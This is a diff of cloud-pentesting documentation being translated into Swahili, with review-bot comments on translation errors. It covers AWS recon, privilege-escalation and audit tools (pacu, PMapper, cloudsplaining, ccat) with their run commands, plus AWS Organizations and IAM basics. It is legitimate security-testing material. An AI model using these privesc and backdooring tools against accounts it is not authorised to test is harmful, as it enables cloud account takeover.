+- **Kuvunja** **mwanachama** katika akaunti ya usimamizi na **`sts:AssumeRole` ruhusa juu ya jukumu katika akaunti za watoto** (hata kama akaunti inaruhusu mtu yeyote kutoka akaunti ya usimamizi kujiwakilisha, kama ni akaunti ya nje, ruhusa maalum za `sts:AssumeRole` zinahitajika).
## Automated Tools
### Recon
-- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby.
-
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): Zana ya **kukusanya hesabu** inayolenga usalama wa AWS iliyoandikwa kwa Ruby.
```bash
# Install
gem install aws_recon
# Recon and get json
AWS_PROFILE= aws_recon \
- --services S3,EC2 \
- --regions global,us-east-1,us-east-2 \
- --verbose
+--services S3,EC2 \
+--regions global,us-east-1,us-east-2 \
+--verbose
```
-
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues.
-
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist ni **chombo cha multi-cloud kwa kupata Mali** (Majina ya Kikoa, Anwani za IP) kutoka kwa Watoa Huduma za Cloud.
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper inakusaidia kuchambua mazingira yako ya Amazon Web Services (AWS). Sasa ina kazi nyingi zaidi, ikiwa ni pamoja na ukaguzi wa masuala ya usalama.
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
{
- "accounts": [
- {
- "default": true,
- "id": "",
- "name": "dev"
- }
- ],
- "cidrs":
- {
- "2.2.2.2/28": {"name": "NY Office"}
- }
+"accounts": [
+{
+"default": true,
+"id": "",
+"name": "dev"
+}
+],
+"cidrs":
+{
+"2.2.2.2/28": {"name": "NY Office"}
+}
}
# Enumerate
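Review bot: "mwanachama" on the last bullet of the root/management section means "member"; an IAM principal should stay "principal" (or "kitambulisho", as this file uses elsewhere for identities), otherwise the sentence reads as compromising a team member. The two explanatory sub-bullets ("Ili kupata akaunti za watoto ..." and "Huwezi kupata jina la majukumu ...") have lost their indent and now sit at the same level as the step they explain. In the code blocks the leading whitespace of the aws_recon continuation lines and of the cloudmapper config.json has been stripped; both still execute/parse, but the JSON is much harder to read, and a translation change should not touch code blocks at all.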
@@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev
python cloudmapper.py prepare #Prepare webserver
python cloudmapper.py webserver #Show webserver
```
-
-- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
-
+- [**cartography**](https://github.com/lyft/cartography): Cartography ni chombo cha Python kinachounganisha mali za miundombinu na uhusiano kati yao katika mtazamo wa grafu wa kueleweka unaoendeshwa na hifadhidata ya Neo4j.
```bash
# Install
pip install cartography
@@ -240,17 +233,15 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
-
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase inakusanya mali na uhusiano kutoka kwa huduma na mifumo ikiwa ni pamoja na miundombinu ya wingu, programu za SaaS, udhibiti wa usalama, na zaidi katika mtazamo wa grafu unaoeleweka unaoungwa mkono na hifadhidata ya Neo4j.
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Inatumia python2) Hii ni zana inayojaribu **kuvumbua yote** [**rasilimali za AWS**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) zilizoundwa katika akaunti.
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): Ni zana ya **kupata anwani zote za IP za umma** (zote IPv4/IPv6) zinazohusishwa na akaunti ya AWS.
### Privesc & Exploiting
-- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- - Note that pacu **only checks your own privescs paths** (not account wide).
-
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Gundua watumiaji wenye mamlaka zaidi katika mazingira ya AWS yaliyoskanwa, ikiwa ni pamoja na AWS Shadow Admins. Inatumia powershell. Unaweza kupata **ufafanuzi wa sera zenye mamlaka** katika kazi **`Check-PrivilegedPolicy`** katika [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu ni **mfumo wa unyakuzi wa AWS** wa chanzo wazi, ulioandaliwa kwa ajili ya majaribio ya usalama wa kukabili dhidi ya mazingira ya wingu. Inaweza **kuorodhesha**, kupata **makosa ya usanidi** na **kuyatumia**. Unaweza kupata **ufafanuzi wa ruhusa zenye mamlaka** katika [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) ndani ya kamusi ya **`user_escalation_methods`**.
+- Kumbuka kwamba pacu **inaangalia tu njia zako za privesc** (sio kwa akaunti nzima).
```bash
# Install
## Feel free to use venvs
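Review bot: the pacu caveat loses its nesting. `- - Note that pacu **only checks your own privescs paths**` was a sub-bullet under the pacu entry, but `+- Kumbuka kwamba pacu **inaangalia tu njia zako za privesc**` is emitted as a top-level item, so it reads as a separate tool in the list. Suggest keeping the two-space indent: `  - Kumbuka kwamba pacu ...`.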
@@ -264,9 +255,7 @@ pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
-
-- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
-
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) ni script na maktaba ya kutambua hatari katika usanidi wa AWS Identity and Access Management (IAM) kwa akaunti ya AWS au shirika la AWS. Inatengeneza mfano wa Watumiaji wa IAM na Majukumu katika akaunti kama grafu iliyoelekezwa, ambayo inaruhusu ukaguzi wa **kuinua mamlaka** na njia mbadala ambazo mshambuliaji anaweza kuchukua ili kupata ufikiaji wa rasilimali au hatua katika AWS. Unaweza kuangalia **permissions used to find privesc** paths katika majina ya faili yanayomalizika na `_edges.py` katika [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
```bash
# Install
pip install principalmapper
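Review bot: the PMapper entry (`+- [**PMapper**]...`) leaves the English fragment "**permissions used to find privesc** paths" in the middle of an otherwise Swahili sentence. Translate it in the same pass, for example "**ruhusa zinazotumika kutafuta njia za privesc**".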
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
-
-- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
- It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
-
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining ni chombo cha Tathmini ya Usalama wa AWS IAM ambacho kinatambua ukiukaji wa haki ndogo na kuzalisha ripoti ya HTML iliyo na kipaumbele cha hatari.\
+Itakuonyesha wateja wanaoweza kuwa **na haki nyingi**, sera za inline na aws **na ni nani **wanachama wanaoingia** kwao. (Haki hizi hazichunguzwi tu kwa privesc bali pia aina nyingine za ruhusa za kuvutia, inapendekezwa kutumika).
```bash
# Install
pip install cloudsplaining
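Review bot: unbalanced bold markers in `+Itakuonyesha wateja ... sera za inline na aws **na ni nani **wanachama wanaoingia** kwao`: the line has three `**` markers, so the emphasis never closes and bleeds into the rest of the paragraph. The source emphasised "policies" and "principals has access to them"; something like `sera za **inline na aws** na **wakuu wanaoweza kuzifikia**` keeps the markers paired. Also, "customer" in the source refers to customer-managed policies, not clients, so "wateja" (customers) changes the meaning; "sera zinazosimamiwa na mteja" is closer.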
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
-
-- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack inakadiria akaunti za AWS kwa **udhaifu wa hijacking wa subdomain** kutokana na usanidi wa Route53 na CloudFront ambao haujashikamana.
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Orodha ya ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag ni chombo ambacho **kinatafuta** kupitia picha za umma za Elastic Block Storage (**EBS**) kwa siri ambazo zinaweza kuwa ziachwa kwa bahati mbaya.
### Audit
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
-
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit na Aqua ni mradi wa chanzo wazi ulioandaliwa kuruhusu kugundua **hatari za usalama katika akaunti za miundombinu ya wingu**, ikiwa ni pamoja na: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), na GitHub (Haifanyi utafutaji wa ShadowAdmins).
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
-
-- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
-
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler ni chombo cha usalama cha Open Source kufanya tathmini za mbinu bora za usalama za AWS, ukaguzi, majibu ya matukio, ufuatiliaji endelevu, kuimarisha na maandalizi ya forensics.
```bash
# Install python3, jq and git
# Install
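Review bot: the ccat entry is only half translated. `+- [**ccat**]...: Orodha ya ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image` renders the first step as a noun ("list of ECR repos") and leaves the remaining three steps in English. Either translate the whole chain or leave it entirely in English as a tool command sequence, but not a mix.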
@@ -331,15 +314,11 @@ prowler -v
prowler
prowler aws --profile custom-profile [-M csv json json-asff html]
```
-
-- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. Itās an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
-
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox inakusaidia kupata ufahamu wa hali katika mazingira ya wingu yasiyojulikana. Ni zana ya mstari wa amri ya chanzo wazi iliyoundwa kusaidia wapenyezi na wataalamu wengine wa usalama wa kukabili kupata njia za shambulio zinazoweza kutumika katika miundombinu ya wingu.
```bash
cloudfox aws --profile [profile-name] all-checks
```
-
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
-
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite ni chombo cha ukaguzi wa usalama wa multi-cloud kilicho wazi, ambacho kinawawezesha kutathmini hali ya usalama ya mazingira ya wingu.
```bash
# Install
virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
# Get info
scout aws -p dev
```
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (inatumia python2.7 na inaonekana haijatunzwa)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus ni chombo chenye nguvu kwa AWS EC2 / S3 / CloudTrail / CloudWatch / KMS mbinu bora za kuimarisha (inaonekana haijatunzwa). Inakagua tu akauti zilizowekwa kwa chaguo-msingi ndani ya mfumo.
-- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
-- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+### Ukaguzi wa Kudumu
-### Constant Audit
-
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian ni injini ya sheria kwa usimamizi wa akaunti na rasilimali za umma za wingu. Inawaruhusu watumiaji **kufafanua sera za kuwezesha miundombinu ya wingu inayosimamiwa vizuri**, ambayo ni salama na imeboreshwa kwa gharama. Inakusanya scripts nyingi za adhoc ambazo mashirika yana nazo kuwa chombo chepesi na chenye kubadilika, chenye vipimo na ripoti zilizounganishwa.
+- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** ni jukwaa la **ufuatiliaji wa kuendelea wa utii, ripoti za utii na automatisering ya usalama kwa wingu**. Katika PacBot, sera za usalama na utii zinawekwa kama msimbo. Rasilimali zote zinazogunduliwa na PacBot zinakaguliwa dhidi ya sera hizi ili kupima utii wa sera. Mfumo wa **auto-fix** wa PacBot unatoa uwezo wa kujibu moja kwa moja kwa ukiukaji wa sera kwa kuchukua hatua zilizowekwa awali.
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert ni mfumo wa uchambuzi wa data wa **wakati halisi** usio na seva ambao unakupa uwezo wa **kuingiza, kuchambua, na kutoa tahadhari** kuhusu data kutoka mazingira yoyote, **ukitumia vyanzo vya data na mantiki ya tahadhari unayofafanua**. Timu za usalama wa kompyuta zinatumia StreamAlert kuchanganua terabytes za data za kumbukumbu kila siku kwa ajili ya kugundua na kujibu matukio.
## DEBUG: Capture AWS cli requests
-
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
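Review bot: typo in the Zeus line `+... Inakagua tu akauti zilizowekwa kwa chaguo-msingi ndani ya mfumo.`: "akauti" should be "akaunti", as spelled elsewhere in this file.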
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
-
-## References
+## Marejeleo
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 02e6e7729..f69207295 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -1,84 +1,78 @@
-# AWS - Basic Information
+# AWS - Taarifa za Msingi
{{#include ../../../banners/hacktricks-training.md}}
-## Organization Hierarchy
+## Hierarchi ya Shirika
.png>)
-### Accounts
+### Akaunti
-In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+Katika AWS kuna **akaunti ya mzizi,** ambayo ni **konteina ya mzazi kwa akaunti zote** za **shirika** lako. Hata hivyo, huwezi kutumia akaunti hiyo kupeleka rasilimali, unaweza kuunda **akaunti nyingine ili kutenganisha miundombinu tofauti za AWS** kati yao.
-This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+Hii ni ya kuvutia kutoka kwa mtazamo wa **usalama**, kwani **akaunti moja haitakuwa na uwezo wa kufikia rasilimali kutoka akaunti nyingine** (isipokuwa madaraja yameundwa mahsusi), hivyo unaweza kuunda mipaka kati ya matumizi.
-Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+Kwa hiyo, kuna **aina mbili za akaunti katika shirika** (tunazungumzia akaunti za AWS na si Akaunti za Mtumiaji): akaunti moja ambayo imewekwa kama akaunti ya usimamizi, na akaunti moja au zaidi za wanachama.
-- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+- **Akaunti ya usimamizi (akaunti ya mzizi)** ndiyo akaunti unayotumia kuunda shirika. Kutoka kwa akaunti ya usimamizi ya shirika, unaweza kufanya yafuatayo:
- - Create accounts in the organization
- - Invite other existing accounts to the organization
- - Remove accounts from the organization
- - Manage invitations
- - Apply policies to entities (roots, OUs, or accounts) within the organization
- - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- - It's possible to login as the root user using the email and password used to create this root account/organization.
+- Kuunda akaunti katika shirika
+- Kualika akaunti nyingine zilizopo katika shirika
+- Kuondoa akaunti kutoka shirika
+- Kudhibiti mialiko
+- Kutumia sera kwa vitu (mizizi, OUs, au akaunti) ndani ya shirika
+- Kuwezesha ujumuishaji na huduma za AWS zinazoungwa mkono ili kutoa kazi za huduma katika akaunti zote za shirika.
+- Inawezekana kuingia kama mtumiaji wa mzizi kwa kutumia barua pepe na nenosiri vilivyotumika kuunda akaunti hii ya mzizi/shirika.
- The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
-
-- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+Akaunti ya usimamizi ina **majukumu ya akaunti ya kulipa** na inawajibika kwa kulipa malipo yote yanayokusanywa na akaunti za wanachama. Huwezi kubadilisha akaunti ya usimamizi ya shirika.
+- **Akaunti za wanachama** zinaunda akaunti zote nyingine katika shirika. Akaunti inaweza kuwa mwanachama wa shirika moja tu kwa wakati mmoja. Unaweza kuambatisha sera kwa akaunti ili kuweka udhibiti kwa akaunti hiyo pekee.
+- Akaunti za wanachama **zinapaswa kutumia anwani halali ya barua pepe** na zinaweza kuwa na **jina**, kwa ujumla hawawezi kudhibiti bili (lakini wanaweza kupewa ufikiaji wa hiyo).
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
+### **Vitengo vya Shirika**
-### **Organization Units**
-
-Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
-
+Akaunti zinaweza kuunganishwa katika **Vitengo vya Shirika (OU)**. Kwa njia hii, unaweza kuunda **sera** za Vitengo vya Shirika ambazo zita **wekwa kwenye akaunti zote za watoto**. Kumbuka kwamba OU inaweza kuwa na OUs zingine kama watoto.
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
-
### Service Control Policy (SCP)
-A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+A **service control policy (SCP)** ni sera inayobainisha huduma na vitendo ambavyo watumiaji na majukumu wanaweza kutumia katika akaunti ambazo SCP inahusisha. SCPs ni **sawa na sera za ruhusa za IAM** isipokuwa kwamba **hazitoi ruhusa yoyote**. Badala yake, SCPs zinaelezea **ruhusa za juu zaidi** kwa shirika, kitengo cha shirika (OU), au akaunti. Unapounganisha SCP na mzizi wa shirika lako au OU, **SCP inakandamiza ruhusa za viumbe katika akaunti za wanachama**.
-This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
-The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+Hii ndiyo NJIA PEKEE ambayo **hata mtumiaji wa mzizi anaweza kuzuiwa** kufanya kitu. Kwa mfano, inaweza kutumika kuzuia watumiaji wasizime CloudTrail au kufuta nakala za akiba.\
+Njia pekee ya kupita hii ni kuathiri pia **akaunti ya mkuu** inayoweka mipangilio ya SCPs (akaunti ya mkuu haiwezi kuzuiwa).
> [!WARNING]
-> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+> Kumbuka kwamba **SCPs zinakandamiza tu wakuu katika akaunti**, hivyo akaunti nyingine hazihusiki. Hii inamaanisha kuwa kuwa na SCP inayokataza `s3:GetObject` haitazuia watu **kupata mfuko wa S3 wa umma** katika akaunti yako.
-SCP examples:
+SCP mifano:
-- Deny the root account entirely
-- Only allow specific regions
-- Only allow white-listed services
-- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+- Kataza akaunti ya mzizi kabisa
+- Ruhusu tu maeneo maalum
+- Ruhusu tu huduma zilizoorodheshwa
+- Kataza GuardDuty, CloudTrail, na S3 Public Block Access kutoka
- being disabled
+kuondolewa
-- Deny security/incident response roles from being deleted or
+- Kataza majukumu ya usalama/mjibu wa tukio kuondolewa au
- modified.
+kubadilishwa.
-- Deny backups from being deleted.
-- Deny creating IAM users and access keys
+- Kataza nakala za akiba kuondolewa.
+- Kataza kuunda watumiaji wa IAM na funguo za ufikiaji
-Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+Pata **mifano ya JSON** katika [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
### ARN
-**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
-
+**Amazon Resource Name** ni **jina la kipekee** kila rasilimali ndani ya AWS ina, imeundwa kama ifuatavyo:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
-
Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS Standard: `aws`
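Review bot: the first paragraph inverts the source. `+... Hata hivyo, huwezi kutumia akaunti hiyo kupeleka rasilimali` says "you cannot use that account to deploy resources", while the source says "you don't need to use that account"; "si lazima utumie akaunti hiyo" keeps the meaning. Further down the same hunk: the management-account sub-bullets (`+- Kuunda akaunti katika shirika` through `+- Inawezekana kuingia kama mtumiaji wa mzizi ...`) and `+- Akaunti za wanachama **zinapaswa kutumia anwani halali ...` were indented sub-items in the source and are now top-level siblings, and `+Akaunti ya usimamizi ina **majukumu ya akaunti ya kulipa**` lost its bullet altogether, so restore the two-space indent and the `- ` marker. `+A **service control policy (SCP)** ni sera ...` keeps the English article "A", and `+SCP mifano:` should read "Mifano ya SCP:". `+kuondolewa` renders "being disabled" as "being removed"; "kuzimwa" matches the source (the SCP prevents GuardDuty and CloudTrail from being turned off, not deleted). Finally, the context line "Note that there are 4 partitions in AWS but only 3 ways to call them:" was left in English and still needs translating.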
@@ -86,246 +80,240 @@ Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
-## IAM - Identity and Access Management
+## IAM - Usimamizi wa Utambulisho na Ufikiaji
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+IAM ni huduma itakayokuruhusu kusimamia **Uthibitishaji**, **Idhini** na **Udhibiti wa Ufikiaji** ndani ya akaunti yako ya AWS.
-- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-- **Access Control** - The method and process of how access is granted to a secure resource
+- **Uthibitishaji** - Mchakato wa kufafanua utambulisho na uthibitisho wa utambulisho huo. Mchakato huu unaweza kugawanywa katika: Utambulisho na uthibitisho.
+- **Idhini** - Inabainisha ni nini utambulisho unaweza kufikia ndani ya mfumo mara tu unapothibitishwa.
+- **Udhibiti wa Ufikiaji** - Njia na mchakato wa jinsi ufikiaji unavyotolewa kwa rasilimali salama.
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+IAM inaweza kufafanuliwa kwa uwezo wake wa kusimamia, kudhibiti na kuongoza mitambo ya uthibitishaji, idhini na udhibiti wa ufikiaji wa utambulisho kwa rasilimali zako ndani ya akaunti yako ya AWS.
-### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
+### [Mtumiaji wa mizizi ya akaunti ya AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
-When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+Unapounda akaunti ya Amazon Web Services (AWS) kwa mara ya kwanza, unaanza na utambulisho mmoja wa kuingia ambao una **ufikiaji kamili kwa huduma zote** za AWS na rasilimali katika akaunti. Hii ni akaunti ya AWS _**mtumiaji wa mizizi**_ na inafikiwa kwa kuingia kwa kutumia **anwani ya barua pepe na nenosiri ulilotumia kuunda akaunti**.
-Note that a new **admin user** will have **less permissions that the root user**.
+Kumbuka kwamba mtumiaji mpya wa **admin** atakuwa na **idhini ndogo kuliko mtumiaji wa mizizi**.
-From a security point of view, it's recommended to create other users and avoid using this one.
+Kutoka kwa mtazamo wa usalama, inapendekezwa kuunda watumiaji wengine na kuepuka kutumia huu.
-### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
+### [Watumiaji wa IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
-An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+Mtumiaji wa IAM ni kiumbe ambacho unaunda katika AWS ili **wakilisha mtu au programu** inayotumia hiyo ili **kuingiliana na AWS**. Mtumiaji katika AWS unajumuisha jina na ithibati (nenosiri na funguo za ufikiaji hadi mbili).
-When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+Unapounda mtumiaji wa IAM, unampa **idhini** kwa kumfanya kuwa **mwanachama wa kundi la watumiaji** ambalo lina sera za idhini zinazofaa (inapendekezwa), au kwa **kuambatanisha sera moja kwa moja** kwa mtumiaji.
